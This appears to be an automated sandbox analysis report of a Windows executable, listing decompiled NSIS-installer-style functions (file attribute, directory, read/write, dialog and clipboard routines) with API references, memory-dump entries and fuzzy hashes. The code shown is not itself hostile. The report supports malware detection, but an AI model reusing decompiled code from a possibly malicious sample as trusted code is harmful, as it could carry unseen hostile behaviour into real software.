                                            			E00405D9C(CHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesA(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesA(_a4, _t3 & 0x000000fe);
				}
				return _t7;
			}





                                            0x00405da1
                                            0x00405da7
                                            0x00405dac
                                            0x00405db5
                                            0x00405db5
                                            0x00405dbe

                                            APIs
                                            • GetFileAttributesA.KERNELBASE(?,?,004059B4,?,?,00000000,00405B97,?,?,?,?), ref: 00405DA1
                                            • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405DB5
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661113502.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.661110204.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661119046.0000000000408000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661122918.000000000040A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661128357.0000000000413000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661135352.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661139040.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661143205.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: AttributesFile
                                            • String ID:
                                            • API String ID: 3188754299-0
                                            • Opcode ID: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
                                            • Instruction ID: 45e1b313f31d266de6e0d804bcdac0c4d644dd7a0ef1fc7463663643c81ebfd1
                                            • Opcode Fuzzy Hash: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
                                            • Instruction Fuzzy Hash: F9D0A932000021ABD2002728EE0C88BBB91DB00270702CA36FCA4A22B2DB300C129A98
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00405892, Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00405892(CHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryA(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




                                            0x00405898
                                            0x004058a0
                                            0x00000000
                                            0x004058a6
                                            0x00000000

                                            APIs
                                            • CreateDirectoryA.KERNELBASE(?,00000000,00403454,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403673,?,00000007,00000009,0000000B), ref: 00405898
                                            • GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 004058A6
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661113502.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.661110204.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661119046.0000000000408000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661122918.000000000040A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661128357.0000000000413000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661135352.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661139040.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661143205.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: CreateDirectoryErrorLast
                                            • String ID:
                                            • API String ID: 1375471231-0
                                            • Opcode ID: 1ac3f182099991a074ef026cd112de1bb624e535cee62a6747cbed0a6cbac083
                                            • Instruction ID: ae32aa403121d558109e23f4dadc85ee7ba81b7b8263ff8d49f56a55f4155d83
                                            • Opcode Fuzzy Hash: 1ac3f182099991a074ef026cd112de1bb624e535cee62a6747cbed0a6cbac083
                                            • Instruction Fuzzy Hash: D5C04C316045019BE6506B319F08B1B7A549F50741F158439A78AE41E4DA388465D92D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00405E68, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00405E68(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                            0x00405e6c
                                            0x00405e7c
                                            0x00405e84
                                            0x00000000
                                            0x00405e8b
                                            0x00000000
                                            0x00405e8d

                                            APIs
                                            • WriteFile.KERNELBASE(0040A130,00000000,00000000,00000000,00000000,0040C697,0040B8F8,0040339A,0040B8F8,0040C697,004138F8,00004000,?,00000000,004031C4,00000004), ref: 00405E7C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661113502.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.661110204.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661119046.0000000000408000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661122918.000000000040A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661128357.0000000000413000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661135352.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661139040.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661143205.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: FileWrite
                                            • String ID:
                                            • API String ID: 3934441357-0
                                            • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                            • Instruction ID: 83138c6b6f61fe56512c00d99342466dd547819508ce818909ec7b1084a3bb5f
                                            • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                            • Instruction Fuzzy Hash: 48E0463221021AABDF109F60CC04AAB3B6CEB00260F404432FAA4E2140E234E9208AE4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00405E39, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00405E39(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                            0x00405e3d
                                            0x00405e4d
                                            0x00405e55
                                            0x00000000
                                            0x00405e5c
                                            0x00000000
                                            0x00405e5e

                                            APIs
                                            • ReadFile.KERNELBASE(0040A130,00000000,00000000,00000000,00000000,004138F8,0040B8F8,00403416,0040A130,0040A130,0040331A,004138F8,00004000,?,00000000,004031C4), ref: 00405E4D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661113502.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.661110204.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661119046.0000000000408000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661122918.000000000040A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661128357.0000000000413000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661135352.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661139040.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661143205.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: FileRead
                                            • String ID:
                                            • API String ID: 2738559852-0
                                            • Opcode ID: 416aeb435aa013431afb1a9c1c8b913c8d53da26c76a00aa22b400e2b7bce1d1
                                            • Instruction ID: cce2834e44819e2e6951819013f8ba23c93adc22c6858a83ce884f24d90f4801
                                            • Opcode Fuzzy Hash: 416aeb435aa013431afb1a9c1c8b913c8d53da26c76a00aa22b400e2b7bce1d1
                                            • Instruction Fuzzy Hash: BFE0463220061AABCF119F60CC00AEB3B6CEB046E0F044832B955E2040D230EA209BE8
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00403419, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00403419(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}




                                            0x00403427
                                            0x0040342d

                                            APIs
                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403117,?), ref: 00403427
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661113502.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.661110204.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661119046.0000000000408000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661122918.000000000040A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661128357.0000000000413000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661135352.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661139040.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661143205.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: FilePointer
                                            • String ID:
                                            • API String ID: 973152223-0
                                            • Opcode ID: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                            • Instruction ID: eadcf480fe67690f272c505b4903882a1233053cb438a9b9796e5ea94341b5dd
                                            • Opcode Fuzzy Hash: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                            • Instruction Fuzzy Hash: 25B09231140200AADA215F409E09F057B21AB94700F208424B244280F086712025EA0D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Non-executed Functions

                                            Function 0040548D, Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282windowclipboardmemoryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 96%
                                            			E0040548D(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				struct tagRECT _v24;
				void* _v32;
				signed int _v36;
				int _v40;
				int _v44;
				signed int _v48;
				int _v52;
				void* _v56;
				void* _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t87;
				struct HWND__* _t89;
				long _t90;
				int _t95;
				int _t96;
				long _t99;
				void* _t102;
				intOrPtr _t124;
				struct HWND__* _t128;
				int _t150;
				int _t153;
				long _t157;
				struct HWND__* _t161;
				struct HMENU__* _t163;
				long _t165;
				void* _t166;
				char* _t167;
				char* _t168;
				int _t169;

				_t87 =  *0x423f24; // 0x0
				_t157 = _a8;
				_t150 = 0;
				_v8 = _t87;
				if(_t157 != 0x110) {
					__eflags = _t157 - 0x405;
					if(_t157 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00405421, GetDlgItem(_a4, 0x3ec), 0,  &_a8));
					}
					__eflags = _t157 - 0x111;
					if(_t157 != 0x111) {
						L17:
						__eflags = _t157 - 0x404;
						if(_t157 != 0x404) {
							L25:
							__eflags = _t157 - 0x7b;
							if(_t157 != 0x7b) {
								goto L20;
							}
							_t89 = _v8;
							__eflags = _a12 - _t89;
							if(_a12 != _t89) {
								goto L20;
							}
							_t90 = SendMessageA(_t89, 0x1004, _t150, _t150);
							__eflags = _t90 - _t150;
							_a12 = _t90;
							if(_t90 <= _t150) {
								L36:
								return 0;
							}
							_t163 = CreatePopupMenu();
							AppendMenuA(_t163, _t150, 1, E004062BB(_t150, _t157, _t163, _t150, 0xffffffe1));
							_t95 = _a16;
							__eflags = _a16 - 0xffffffff;
							_t153 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v24);
								_t95 = _v24.left;
								_t153 = _v24.top;
							}
							_t96 = TrackPopupMenu(_t163, 0x180, _t95, _t153, _t150, _a4, _t150);
							__eflags = _t96 - 1;
							if(_t96 == 1) {
								_t165 = 1;
								__eflags = 1;
								_v56 = _t150;
								_v44 = 0x420d50;
								_v40 = 0x1000;
								_a4 = _a12;
								do {
									_a4 = _a4 - 1;
									_t99 = SendMessageA(_v8, 0x102d, _a4,  &_v64);
									__eflags = _a4 - _t150;
									_t165 = _t165 + _t99 + 2;
								} while (_a4 != _t150);
								OpenClipboard(_t150);
								EmptyClipboard();
								_t102 = GlobalAlloc(0x42, _t165);
								_a4 = _t102;
								_t166 = GlobalLock(_t102);
								do {
									_v44 = _t166;
									_t167 = _t166 + SendMessageA(_v8, 0x102d, _t150,  &_v64);
									 *_t167 = 0xd;
									_t168 = _t167 + 1;
									 *_t168 = 0xa;
									_t166 = _t168 + 1;
									_t150 = _t150 + 1;
									__eflags = _t150 - _a12;
								} while (_t150 < _a12);
								GlobalUnlock(_a4);
								SetClipboardData(1, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						__eflags =  *0x423f0c - _t150; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x424748, 8);
							__eflags =  *0x4247ec - _t150;
							if( *0x4247ec == _t150) {
								E0040534F( *((intOrPtr*)( *0x420528 + 0x34)), _t150);
							}
							E00404285(1);
							goto L25;
						}
						 *0x420120 = 2;
						E00404285(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E00404313(_t157, _a12, _a16);
						}
						ShowWindow( *0x423f10, _t150);
						ShowWindow(_v8, 8);
						E004042E1(_v8);
						goto L17;
					}
				}
				_v48 = _v48 | 0xffffffff;
				_v36 = _v36 | 0xffffffff;
				_t169 = 2;
				_v56 = _t169;
				_v52 = 0;
				_v44 = 0;
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				_t124 =  *0x424754;
				_a12 =  *((intOrPtr*)(_t124 + 0x5c));
				_a8 =  *((intOrPtr*)(_t124 + 0x60));
				 *0x423f10 = GetDlgItem(_a4, 0x403);
				 *0x423f08 = GetDlgItem(_a4, 0x3ee);
				_t128 = GetDlgItem(_a4, 0x3f8);
				 *0x423f24 = _t128;
				_v8 = _t128;
				E004042E1( *0x423f10);
				 *0x423f14 = E00404BD2(4);
				 *0x423f2c = 0;
				GetClientRect(_v8,  &_v24);
				_v48 = _v24.right - GetSystemMetrics(_t169);
				SendMessageA(_v8, 0x101b, 0,  &_v56);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a12 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a12);
					SendMessageA(_v8, 0x1026, 0, _a12);
				}
				if(_a8 >= _t150) {
					SendMessageA(_v8, 0x1024, _t150, _a8);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E004042AC(_a4);
				if(( *0x42475c & 0x00000003) != 0) {
					ShowWindow( *0x423f10, _t150);
					if(( *0x42475c & 0x00000002) != 0) {
						 *0x423f10 = _t150;
					} else {
						ShowWindow(_v8, 8);
					}
					E004042E1( *0x423f08);
				}
				_t161 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t161, 0x401, _t150, 0x75300000);
				if(( *0x42475c & 0x00000004) != 0) {
					SendMessageA(_t161, 0x409, _t150, _a8);
					SendMessageA(_t161, 0x2001, _t150, _a12);
				}
				goto L36;
			}



































                                            0x00405493
                                            0x0040549b
                                            0x0040549e
                                            0x004054a6
                                            0x004054a9
                                            0x00405638
                                            0x0040563e
                                            0x00405662
                                            0x00405662
                                            0x0040566e
                                            0x00405674
                                            0x00405696
                                            0x00405696
                                            0x0040569c
                                            0x004056f1
                                            0x004056f1
                                            0x004056f4
                                            0x00000000
                                            0x00000000
                                            0x004056f6
                                            0x004056f9
                                            0x004056fc
                                            0x00000000
                                            0x00000000
                                            0x00405706
                                            0x0040570c
                                            0x0040570e
                                            0x00405711
                                            0x0040580e
                                            0x00000000
                                            0x0040580e
                                            0x00405720
                                            0x0040572c
                                            0x00405735
                                            0x0040573c
                                            0x00405740
                                            0x00405743
                                            0x0040574c
                                            0x00405752
                                            0x00405755
                                            0x00405755
                                            0x00405765
                                            0x0040576b
                                            0x0040576e
                                            0x00405779
                                            0x00405779
                                            0x0040577a
                                            0x0040577d
                                            0x00405784
                                            0x0040578b
                                            0x00405793
                                            0x00405793
                                            0x004057a1
                                            0x004057a7
                                            0x004057aa
                                            0x004057aa
                                            0x004057b1
                                            0x004057b7
                                            0x004057c0
                                            0x004057c7
                                            0x004057d0
                                            0x004057d2
                                            0x004057d5
                                            0x004057e4
                                            0x004057e6
                                            0x004057e9
                                            0x004057ea
                                            0x004057ed
                                            0x004057ee
                                            0x004057ef
                                            0x004057ef
                                            0x004057f7
                                            0x00405802
                                            0x00405808
                                            0x00405808
                                            0x00000000
                                            0x0040576e
                                            0x0040569e
                                            0x004056a4
                                            0x004056d2
                                            0x004056d4
                                            0x004056da
                                            0x004056e5
                                            0x004056e5
                                            0x004056ec
                                            0x00000000
                                            0x004056ec
                                            0x004056a8
                                            0x004056b2
                                            0x00000000
                                            0x00405676
                                            0x00405676
                                            0x0040567c
                                            0x004056b7
                                            0x00000000
                                            0x004056be
                                            0x00405685
                                            0x0040568c
                                            0x00405691
                                            0x00000000
                                            0x00405691
                                            0x00405674
                                            0x004054af
                                            0x004054b3
                                            0x004054bb
                                            0x004054bf
                                            0x004054c2
                                            0x004054c5
                                            0x004054c8
                                            0x004054cb
                                            0x004054cc
                                            0x004054cd
                                            0x004054e6
                                            0x004054e9
                                            0x004054f3
                                            0x00405502
                                            0x0040550a
                                            0x00405512
                                            0x00405517
                                            0x0040551a
                                            0x00405526
                                            0x0040552f
                                            0x00405538
                                            0x0040555a
                                            0x00405560
                                            0x00405571
                                            0x00405576
                                            0x00405584
                                            0x00405592
                                            0x00405592
                                            0x00405597
                                            0x004055a5
                                            0x004055a5
                                            0x004055aa
                                            0x004055ad
                                            0x004055b2
                                            0x004055be
                                            0x004055c7
                                            0x004055d4
                                            0x004055e3
                                            0x004055d6
                                            0x004055db
                                            0x004055db
                                            0x004055ef
                                            0x004055ef
                                            0x00405603
                                            0x0040560c
                                            0x00405615
                                            0x00405625
                                            0x00405631
                                            0x00405631
                                            0x00000000

                                            APIs
                                            • GetDlgItem.USER32 ref: 004054EC
                                            • GetDlgItem.USER32 ref: 004054FB
                                            • GetClientRect.USER32 ref: 00405538
                                            • GetSystemMetrics.USER32 ref: 0040553F
                                            • SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405560
                                            • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405571
                                            • SendMessageA.USER32(?,00001001,00000000,?), ref: 00405584
                                            • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405592
                                            • SendMessageA.USER32(?,00001024,00000000,?), ref: 004055A5
                                            • ShowWindow.USER32(00000000,?,0000001B,?), ref: 004055C7
                                            • ShowWindow.USER32(?,00000008), ref: 004055DB
                                            • GetDlgItem.USER32 ref: 004055FC
                                            • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 0040560C
                                            • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 00405625
                                            • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 00405631
                                            • GetDlgItem.USER32 ref: 0040550A
                                              • Part of subcall function 004042E1: SendMessageA.USER32(00000028,?,00000001,00404111), ref: 004042EF
                                            • GetDlgItem.USER32 ref: 0040564D
                                            • CreateThread.KERNEL32(00000000,00000000,Function_00005421,00000000), ref: 0040565B
                                            • CloseHandle.KERNEL32(00000000), ref: 00405662
                                            • ShowWindow.USER32(00000000), ref: 00405685
                                            • ShowWindow.USER32(?,00000008), ref: 0040568C
                                            • ShowWindow.USER32(00000008), ref: 004056D2
                                            • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405706
                                            • CreatePopupMenu.USER32 ref: 00405717
                                            • AppendMenuA.USER32 ref: 0040572C
                                            • GetWindowRect.USER32 ref: 0040574C
                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405765
                                            • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004057A1
                                            • OpenClipboard.USER32(00000000), ref: 004057B1
                                            • EmptyClipboard.USER32 ref: 004057B7
                                            • GlobalAlloc.KERNEL32(00000042,?), ref: 004057C0
                                            • GlobalLock.KERNEL32 ref: 004057CA
                                            • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004057DE
                                            • GlobalUnlock.KERNEL32(00000000), ref: 004057F7
                                            • SetClipboardData.USER32(00000001,00000000), ref: 00405802
                                            • CloseClipboard.USER32 ref: 00405808
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661113502.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.661110204.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661119046.0000000000408000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661122918.000000000040A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661128357.0000000000413000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661135352.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661139040.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661143205.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                            • String ID: PB
                                            • API String ID: 590372296-3196168531
                                            • Opcode ID: bc35d437d32a5d9e0c2e08b7534ebc779b05656c8fefaf435ff26a8f2e4e9d86
                                            • Instruction ID: 9c2a32fab53b6b0d4bb0e075a5e6b47c54eb8059f7c6cc06f8c9c6988e8d3156
                                            • Opcode Fuzzy Hash: bc35d437d32a5d9e0c2e08b7534ebc779b05656c8fefaf435ff26a8f2e4e9d86
                                            • Instruction Fuzzy Hash: 42A16C71A00608BFDB119FA0DE85AAE7BB9FB48354F40403AFA44B61A0CB794E51DF58
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0040473E, Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 274stringCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 78%
                                            			E0040473E(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				CHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				CHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				signed char* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed char _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				CHAR* _t146;
				intOrPtr _t147;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed char* _t160;
				struct HWND__* _t165;
				struct HWND__* _t166;
				int _t168;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x420528;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x425000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E00405928(0x3fb, _t146);
					E00406503(_t146);
				}
				_t166 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405928(0x3fb, _t146);
							if(E00405CAE(_t185, _t146) == 0) {
								_v8 = 1;
							}
							E00406228(0x41fd20, _t146);
							_t87 = E00406631(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00406228(0x41fd20, _t146);
								_t89 = E00405C59(0x41fd20);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 =  *_t89 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x41fd20,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t168 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x41fd20) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x41fd20,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405C07(0x41fd20);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160 - 1;
									 *_t159 = 0x5c;
									if(_t159 != 0x41fd20) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t168 = 0x400;
								L36:
								_t95 = E00404BD2(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								_t147 =  *0x423f1c; // 0x77c7ec
								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
									E00404BBA(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextA(_a4, _t168, 0x41fd10);
									} else {
										E00404AF5(_t168, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x424804 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t168) != 0) {
									_v8 = _t158;
								}
								E004042CE(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x420d40 == _t158) {
									E00404697();
								}
								 *0x420d40 = _t158;
								goto L53;
							}
						}
						_t185 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t166;
							_v72 = 0x420d50;
							_v60 = E00404A8F;
							_v56 = _t146;
							_v68 = E004062BB(_t146, 0x420d50, _t166, 0x420128, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405BC0(_t146);
								_t125 =  *((intOrPtr*)( *0x424754 + 0x11c));
								if( *((intOrPtr*)( *0x424754 + 0x11c)) != 0 && _t146 == "C:\\Users\\jones\\AppData\\Local\\Temp") {
									E004062BB(_t146, 0x420d50, _t166, 0, _t125);
									if(lstrcmpiA(0x4236e0, 0x420d50) != 0) {
										lstrcatA(_t146, 0x4236e0);
									}
								}
								 *0x420d40 =  *0x420d40 + 1;
								SetDlgItemTextA(_t166, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t165 = GetDlgItem(_t166, 0x3fb);
					if(E00405C2D(_t146) != 0 && E00405C59(_t146) == 0) {
						E00405BC0(_t146);
					}
					 *0x423f18 = _t166;
					SetWindowTextA(_t165, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E004042AC(_t166);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E004042AC(_t166);
					E004042E1(_t165);
					_t138 = E00406631(8);
					if(_t138 == 0) {
						L53:
						return E00404313(_a8, _a12, _a16);
					} else {
						 *_t138(_t165, 1);
						goto L8;
					}
				}
			}














































                                            0x0040473e
                                            0x00404744
                                            0x0040474a
                                            0x00404757
                                            0x00404765
                                            0x00404768
                                            0x00404770
                                            0x00404776
                                            0x00404776
                                            0x00404782
                                            0x00404785
                                            0x004047f3
                                            0x004047fa
                                            0x004048d1
                                            0x004048d8
                                            0x004048e7
                                            0x004048e7
                                            0x004048eb
                                            0x004048f5
                                            0x00404902
                                            0x00404904
                                            0x00404904
                                            0x00404912
                                            0x00404919
                                            0x00404920
                                            0x00404923
                                            0x0040495a
                                            0x0040495c
                                            0x00404962
                                            0x00404967
                                            0x0040496b
                                            0x0040496d
                                            0x0040496d
                                            0x00404989
                                            0x00000000
                                            0x0040498b
                                            0x0040498e
                                            0x0040499c
                                            0x004049a2
                                            0x004049a3
                                            0x004049a6
                                            0x004049a9
                                            0x00000000
                                            0x004049a9
                                            0x00404925
                                            0x00404927
                                            0x0040492b
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0040492d
                                            0x0040492d
                                            0x0040493a
                                            0x0040493f
                                            0x00000000
                                            0x00000000
                                            0x00404943
                                            0x00404945
                                            0x00404945
                                            0x0040494d
                                            0x0040494f
                                            0x00404952
                                            0x00404955
                                            0x00404958
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00404958
                                            0x004049b5
                                            0x004049bf
                                            0x004049c2
                                            0x004049c5
                                            0x004049cc
